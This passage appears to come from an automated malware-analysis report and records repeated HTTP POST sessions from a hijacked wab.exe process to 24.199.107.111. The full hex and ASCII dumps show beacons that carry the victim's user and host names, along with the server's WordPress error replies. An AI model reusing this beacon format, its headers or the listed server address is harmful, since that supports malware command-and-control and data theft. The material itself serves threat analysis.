                                                                              Connection: close
                                                                              Apr 18, 2024 21:14:56.869239092 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:14:57.709449053 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:14:56 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:14:57.709476948 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:14:57.709491014 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.54972324.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:14:58.054487944 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:14:58.216830969 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:14:59.031183004 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:14:58 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:14:59.031218052 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:14:59.031233072 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.54972424.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:14:59.337352991 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:14:59.502010107 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:00.327156067 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:14:59 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:00.327189922 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:00.327205896 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.54972524.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:00.650945902 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:00.813508987 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:01.671185970 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:00 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 